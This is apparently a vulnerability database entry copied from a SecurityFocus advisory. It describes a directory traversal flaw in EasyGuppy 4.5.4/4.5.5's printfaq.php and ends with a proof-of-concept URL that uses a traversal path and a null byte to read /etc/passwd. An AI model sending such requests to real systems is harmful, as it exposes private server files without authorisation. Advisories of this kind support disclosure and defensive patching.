EasyGuppy 4.5.4/4.5.5 Printfaq.PHP Directory Traversal Vulnerability

2014-07-01T00:00:00
ID SSV:79954
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/14984/info

EasyGuppy is prone to a directory traversal vulnerability.

The application fails to properly sanitize input supplied through HTTP POST requests or cookies.

Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. 

http://www.example.com/printfaq.php?lng=en&pg=/../../../../../../../etc/passwd%00